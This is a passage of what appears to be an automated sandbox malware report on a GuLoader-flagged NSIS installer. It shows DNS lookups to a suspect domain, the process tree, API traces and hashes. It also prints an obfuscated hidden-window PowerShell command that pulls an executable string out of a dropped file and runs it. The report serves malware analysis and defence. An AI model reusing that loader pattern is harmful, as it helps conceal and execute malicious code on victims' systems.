Oct 29, 2024 14:18:39.796499968 CET	62010	53	192.168.2.6	1.1.1.1
Oct 29, 2024 14:18:39.812179089 CET	53	62010	1.1.1.1	192.168.2.6
Oct 29, 2024 14:18:44.796170950 CET	56614	53	192.168.2.6	1.1.1.1
Oct 29, 2024 14:18:44.806082010 CET	53	56614	1.1.1.1	192.168.2.6
Oct 29, 2024 14:18:49.829406977 CET	59794	53	192.168.2.6	1.1.1.1
Oct 29, 2024 14:18:49.839019060 CET	53	59794	1.1.1.1	192.168.2.6
Oct 29, 2024 14:18:54.765526056 CET	61672	53	192.168.2.6	1.1.1.1
Oct 29, 2024 14:18:54.777455091 CET	53	61672	1.1.1.1	192.168.2.6
Oct 29, 2024 14:18:59.765625000 CET	60877	53	192.168.2.6	1.1.1.1
Oct 29, 2024 14:18:59.775131941 CET	53	60877	1.1.1.1	192.168.2.6
Oct 29, 2024 14:19:04.767098904 CET	62417	53	192.168.2.6	1.1.1.1
Oct 29, 2024 14:19:04.777487993 CET	53	62417	1.1.1.1	192.168.2.6
Oct 29, 2024 14:19:09.796567917 CET	50869	53	192.168.2.6	1.1.1.1
Oct 29, 2024 14:19:09.806176901 CET	53	50869	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 29, 2024 14:18:15.696867943 CET	192.168.2.6	1.1.1.1	0x5419	Standard query (0)	www.bookinginfo.asia	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:18:19.796988010 CET	192.168.2.6	1.1.1.1	0xfabb	Standard query (0)	www.bookinginfo.asia	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:18:24.812746048 CET	192.168.2.6	1.1.1.1	0xd5f9	Standard query (0)	www.bookinginfo.asia	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:18:29.859250069 CET	192.168.2.6	1.1.1.1	0xd49	Standard query (0)	www.bookinginfo.asia	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:18:34.812494040 CET	192.168.2.6	1.1.1.1	0x8f5	Standard query (0)	www.bookinginfo.asia	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:18:39.796499968 CET	192.168.2.6	1.1.1.1	0x1033	Standard query (0)	www.bookinginfo.asia	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:18:44.796170950 CET	192.168.2.6	1.1.1.1	0x67d9	Standard query (0)	www.bookinginfo.asia	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:18:49.829406977 CET	192.168.2.6	1.1.1.1	0xcf06	Standard query (0)	www.bookinginfo.asia	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:18:54.765526056 CET	192.168.2.6	1.1.1.1	0x67e3	Standard query (0)	www.bookinginfo.asia	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:18:59.765625000 CET	192.168.2.6	1.1.1.1	0xfa5c	Standard query (0)	www.bookinginfo.asia	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:19:04.767098904 CET	192.168.2.6	1.1.1.1	0xd7a3	Standard query (0)	www.bookinginfo.asia	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:19:09.796567917 CET	192.168.2.6	1.1.1.1	0x40f1	Standard query (0)	www.bookinginfo.asia	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 29, 2024 14:18:15.706840038 CET	1.1.1.1	192.168.2.6	0x5419	Name error (3)	www.bookinginfo.asia	none	none	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:18:19.921226978 CET	1.1.1.1	192.168.2.6	0xfabb	Name error (3)	www.bookinginfo.asia	none	none	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:18:24.823158026 CET	1.1.1.1	192.168.2.6	0xd5f9	Name error (3)	www.bookinginfo.asia	none	none	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:18:29.868659019 CET	1.1.1.1	192.168.2.6	0xd49	Name error (3)	www.bookinginfo.asia	none	none	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:18:34.822526932 CET	1.1.1.1	192.168.2.6	0x8f5	Name error (3)	www.bookinginfo.asia	none	none	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:18:39.812179089 CET	1.1.1.1	192.168.2.6	0x1033	Name error (3)	www.bookinginfo.asia	none	none	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:18:44.806082010 CET	1.1.1.1	192.168.2.6	0x67d9	Name error (3)	www.bookinginfo.asia	none	none	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:18:49.839019060 CET	1.1.1.1	192.168.2.6	0xcf06	Name error (3)	www.bookinginfo.asia	none	none	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:18:54.777455091 CET	1.1.1.1	192.168.2.6	0x67e3	Name error (3)	www.bookinginfo.asia	none	none	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:18:59.775131941 CET	1.1.1.1	192.168.2.6	0xfa5c	Name error (3)	www.bookinginfo.asia	none	none	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:19:04.777487993 CET	1.1.1.1	192.168.2.6	0xd7a3	Name error (3)	www.bookinginfo.asia	none	none	A (IP address)	IN (0x0001)	false
Oct 29, 2024 14:19:09.806176901 CET	1.1.1.1	192.168.2.6	0x40f1	Name error (3)	www.bookinginfo.asia	none	none	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	09:17:05
Start date:	29/10/2024
Path:	C:\Users\user\Desktop\3lH2EWD4wU.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\3lH2EWD4wU.exe"
Imagebase:	0x400000
File size:	738'435 bytes
MD5 hash:	2F9C0BA283506D8333E4F59B29FBEBA3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:17:06
Start date:	29/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) "
Imagebase:	0xfd0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:17:06
Start date:	29/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:18:06
Start date:	29/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x4b0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.3447816394.0000000007D74000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	23.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.3%
Total number of Nodes:	1274
Total number of Limit Nodes:	31

Executed Functions

Function 0040320C Relevance: 93.1, APIs: 32, Strings: 21, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403231
GetVersion.KERNEL32 ref: 00403237
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040326A
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032A6
OleInitialize.OLE32(00000000), ref: 004032AD
SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032C9
GetCommandLineA.KERNEL32(Agitationers Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004032DE
CharNextA.USER32(00000000,"C:\Users\user\Desktop\3lH2EWD4wU.exe",00000020,"C:\Users\user\Desktop\3lH2EWD4wU.exe",00000000,?,00000006,00000008,0000000A), ref: 0040331A
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403417
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403428
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403434
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403448
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403450
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403461
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403469
DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040347D

Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365

Part of subcall function 004037CE: lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank,1033,Agitationers Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Agitationers Setup: Completed,00000000,00000002,76233410), ref: 004038BE
Part of subcall function 004037CE: lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
Part of subcall function 004037CE: GetFileAttributesA.KERNEL32(: Completed), ref: 004038DC
Part of subcall function 004037CE: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank), ref: 00403925
Part of subcall function 004037CE: RegisterClassA.USER32(0042EBA0), ref: 00403962

Part of subcall function 004036F4: CloseHandle.KERNEL32(000002C8,0040352B,?,?,00000006,00000008,0000000A), ref: 004036FF

OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040352B
ExitProcess.KERNEL32 ref: 0040354C
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403669
OpenProcessToken.ADVAPI32(00000000), ref: 00403670
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403688
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A7
ExitWindowsEx.USER32(00000002,80040002), ref: 004036CB
ExitProcess.KERNEL32 ref: 004036EE

Part of subcall function 004056BC: MessageBoxIndirectA.USER32(0040A218), ref: 00405717

Strings

C:\Users\user\Desktop\3lH2EWD4wU.exe, xrefs: 00403609
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank, xrefs: 004033FC, 004034FD, 004035A7, 004035B0
\Temp, xrefs: 0040342E
Agitationers Setup, xrefs: 004032D4
Error launching installer, xrefs: 004034E3
"C:\Users\user\Desktop\3lH2EWD4wU.exe", xrefs: 004032E4, 004032EA, 004034A1
`K$v, xrefs: 00403455
", xrefs: 0040333F
TEMP, xrefs: 0040345C
Low, xrefs: 0040344A
NSIS Error, xrefs: 004032CF
UXTHEME, xrefs: 0040325E, 00403263, 00403269
1033, xrefs: 00403478
SeShutdownPrivilege, xrefs: 00403682
~nsu, xrefs: 00403557
C:\Users\user\Desktop, xrefs: 0040357E, 00403583, 004035AF
TMP, xrefs: 00403464
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd, xrefs: 00403508
.tmp, xrefs: 00403573
C:\Users\user\AppData\Local\Temp\, xrefs: 0040340C, 00403411, 00403427, 00403433, 00403442, 0040344F, 0040345B, 00403463, 0040355C, 0040356D, 00403578, 00403584, 00403591, 004035A0, 0040364F
Triu,fe$, xrefs: 004035BE

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$"C:\Users\user\Desktop\3lH2EWD4wU.exe"$.tmp$1033$Agitationers Setup$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank$C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd$C:\Users\user\Desktop$C:\Users\user\Desktop\3lH2EWD4wU.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$Triu,fe$$UXTHEME$\Temp$`K$v$~nsu
API String ID: 3776617018-454720022
Opcode ID: aa8e0ef1eb72b8bc744683be083ef578b0b61129bd2ec06390cc6719ef15a54d
Instruction ID: 947ab88924f8c3b38e2aea5cfaab7316d1dfac26a51a196f62222c0ed64aafcd
Opcode Fuzzy Hash: aa8e0ef1eb72b8bc744683be083ef578b0b61129bd2ec06390cc6719ef15a54d
Instruction Fuzzy Hash: EEC1D470604741AAD7216F759E89B2F3EACAF45706F44053FF581B61E2CB7C8A058B2E

Function 00405205 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405264
GetDlgItem.USER32(?,000003EE), ref: 00405273
GetClientRect.USER32(?,?), ref: 004052B0
GetSystemMetrics.USER32(00000002), ref: 004052B7
SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052D8
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052E9
SendMessageA.USER32(?,00001001,00000000,?), ref: 004052FC
SendMessageA.USER32(?,00001026,00000000,?), ref: 0040530A
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040531D
ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040533F
ShowWindow.USER32(?,00000008), ref: 00405353
GetDlgItem.USER32(?,000003EC), ref: 00405374
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405384
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040539D
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053A9
GetDlgItem.USER32(?,000003F8), ref: 00405282

Part of subcall function 00404074: SendMessageA.USER32(00000028,?,00000001,00403EA4), ref: 00404082

GetDlgItem.USER32(?,000003EC), ref: 004053C5
CreateThread.KERNELBASE(00000000,00000000,Function_00005199,00000000), ref: 004053D3
CloseHandle.KERNELBASE(00000000), ref: 004053DA
ShowWindow.USER32(00000000), ref: 004053FD
ShowWindow.USER32(?,00000008), ref: 00405404
ShowWindow.USER32(00000008), ref: 0040544A
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040547E
CreatePopupMenu.USER32 ref: 0040548F
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054A4
GetWindowRect.USER32(?,000000FF), ref: 004054C4
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054DD
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405519
OpenClipboard.USER32(00000000), ref: 00405529
EmptyClipboard.USER32 ref: 0040552F
GlobalAlloc.KERNEL32(00000042,?), ref: 00405538
GlobalLock.KERNEL32(00000000), ref: 00405542
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405556
GlobalUnlock.KERNEL32(00000000), ref: 0040556F
SetClipboardData.USER32(00000001,00000000), ref: 0040557A
CloseClipboard.USER32 ref: 00405580

Strings

Agitationers Setup: Completed, xrefs: 004054F5

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: Agitationers Setup: Completed
API String ID: 590372296-3562675674
Opcode ID: 8d4fafd702a39b7bb38b3c828f48a19304575bcb563af6747f1ba819efe14e22
Instruction ID: f54484deaadc53d59d965fa3ad24bc50442bab3dbb2bc57f5e3c058b1bd1a4dd
Opcode Fuzzy Hash: 8d4fafd702a39b7bb38b3c828f48a19304575bcb563af6747f1ba819efe14e22
Instruction Fuzzy Hash: 10A14871900608BFDB11AF61DE89AAF7F79FB08354F40403AFA41B61A0C7754E519F68

Function 004062A3 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(76233410,0042C0C0,0042BC78,00405A69,0042BC78,0042BC78,00000000,0042BC78,0042BC78,76233410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,76233410,C:\Users\user\AppData\Local\Temp\), ref: 004062AE
FindClose.KERNEL32(00000000), ref: 004062BA

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
Instruction ID: 1e2c953ed1559e2f686ededff4fae2b078191910b4ed7f61f032671a7c701700
Opcode Fuzzy Hash: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
Instruction Fuzzy Hash: ACD01236519020ABC21027787E0C84B7A589F053347118A7BF4A6F21E0C7348C6686DC

Function 00403B6B Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BA7
ShowWindow.USER32(?), ref: 00403BC4
DestroyWindow.USER32 ref: 00403BD8
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BF4
GetDlgItem.USER32(?,?), ref: 00403C15
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C29
IsWindowEnabled.USER32(00000000), ref: 00403C30
GetDlgItem.USER32(?,00000001), ref: 00403CDE
GetDlgItem.USER32(?,00000002), ref: 00403CE8
SetClassLongA.USER32(?,000000F2,?), ref: 00403D02
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D53
GetDlgItem.USER32(?,00000003), ref: 00403DF9
ShowWindow.USER32(00000000,?), ref: 00403E1A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E2C
EnableWindow.USER32(?,?), ref: 00403E47
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E5D
EnableMenuItem.USER32(00000000), ref: 00403E64
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E7C
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E8F
lstrlenA.KERNEL32(Agitationers Setup: Completed,?,Agitationers Setup: Completed,00000000), ref: 00403EB9
SetWindowTextA.USER32(?,Agitationers Setup: Completed), ref: 00403EC8
ShowWindow.USER32(?,0000000A), ref: 00403FFC

Strings

Agitationers Setup: Completed, xrefs: 00403EA9, 00403EAF, 00403EB8, 00403EC6

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Agitationers Setup: Completed
API String ID: 3282139019-3562675674
Opcode ID: d4f5cfe3c3c51a6681682eed2f77fa7a99c8bad0dac829668d753dca6044b2b8
Instruction ID: 5f88be39a50f3dd075596c1c1d09af532afca629c850b085fe9e60943a8810da
Opcode Fuzzy Hash: d4f5cfe3c3c51a6681682eed2f77fa7a99c8bad0dac829668d753dca6044b2b8
Instruction Fuzzy Hash: B7C19171604605ABEB206F62DE45E2B3FBCEB4570AF40053EF642B11E1CB799942DB1D

Function 004037CE Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365

lstrcatA.KERNEL32(1033,Agitationers Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Agitationers Setup: Completed,00000000,00000002,76233410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3lH2EWD4wU.exe",00000000), ref: 00403849
lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank,1033,Agitationers Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Agitationers Setup: Completed,00000000,00000002,76233410), ref: 004038BE
lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
GetFileAttributesA.KERNEL32(: Completed), ref: 004038DC
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank), ref: 00403925

Part of subcall function 00405EFE: wsprintfA.USER32 ref: 00405F0B

RegisterClassA.USER32(0042EBA0), ref: 00403962
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040397A
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039AF
ShowWindow.USER32(00000005,00000000), ref: 004039E5
GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 00403A11
GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403A1E
RegisterClassA.USER32(0042EBA0), ref: 00403A27
DialogBoxParamA.USER32(?,00000000,00403B6B,00000000), ref: 00403A46

Strings

Agitationers Setup: Completed, xrefs: 004037FA, 00403800, 00403825, 0040382E, 00403843
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank, xrefs: 00403858, 00403860, 004038F8, 004038FE, 0040390E
.exe, xrefs: 004038CB
.DEFAULT\Control Panel\International, xrefs: 00403834
RichEdit, xrefs: 00403A18
RichEdit20A, xrefs: 00403A09, 00403A0F
_Nb, xrefs: 00403941, 004039A9
"C:\Users\user\Desktop\3lH2EWD4wU.exe", xrefs: 004037D2
RichEd20, xrefs: 004039EB
Control Panel\Desktop\ResourceLocale, xrefs: 00403802
1033, xrefs: 004037EE, 00403844
: Completed, xrefs: 0040388C, 00403894, 004038A1, 004038EB, 004038F1
RichEd32, xrefs: 004039F9
C:\Users\user\AppData\Local\Temp\, xrefs: 004037D3

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\3lH2EWD4wU.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$Agitationers Setup: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-500145199
Opcode ID: 28a6cb2043b9e6f93c7e77f288588c57623ef7bc68a152342dd55961b2cdd3aa
Instruction ID: 8d2c68cc78653f9ce1e9d6bc3eacbdf8e43f68bf53c64efb99e72e2069adee56
Opcode Fuzzy Hash: 28a6cb2043b9e6f93c7e77f288588c57623ef7bc68a152342dd55961b2cdd3aa
Instruction Fuzzy Hash: BE61EA70340601BED620BB669D46F373EACEB54749F40447FF985B22E2CB7C59069A2D

Function 00402D63 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402D74
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\3lH2EWD4wU.exe,00000400), ref: 00402D90

Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\3lH2EWD4wU.exe,80000000,00000003), ref: 00405B3D
Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F

